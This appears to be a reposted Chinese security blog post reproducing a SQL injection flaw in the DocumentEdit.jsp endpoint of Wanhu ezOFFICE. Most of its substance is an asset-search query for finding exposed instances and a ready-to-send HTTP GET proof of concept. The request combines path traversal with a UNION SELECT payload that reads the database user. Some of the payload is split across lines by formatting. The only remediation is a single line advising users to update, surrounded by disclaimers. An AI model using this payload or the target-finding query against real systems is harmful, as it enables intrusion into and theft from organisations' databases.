“ 人性的背后是白云苍狗,愿你我都是生活的高手。”
免责声明:文章中内容来源于互联网,涉及的所有内容仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章中涉及的漏洞均已修复,敏感信息均已做打码处理。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。
0x00.产品介绍
X户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。
0x01.漏洞介绍
DocumentEdit.jsp接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息
0x03.漏洞复现
app="ezOFFICE协同管理平台"
poc
GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1'%20union%20select%20null,null,(
select
%
20
user
%
20
from
%
20
dual),
null
,
null
,
null
,
null
,
null
,
null
,
null
%
20
from
%
20
dual
-- HTTP/1.1
Host: your-ip
User
-
Agent
: Mozilla/
5.0
(Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
0x04.修复建议
官方已修复此漏洞,建议受影响用户尽快更新
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):X户 ezOFFICE DocumentEdit.jsp SQL注入漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论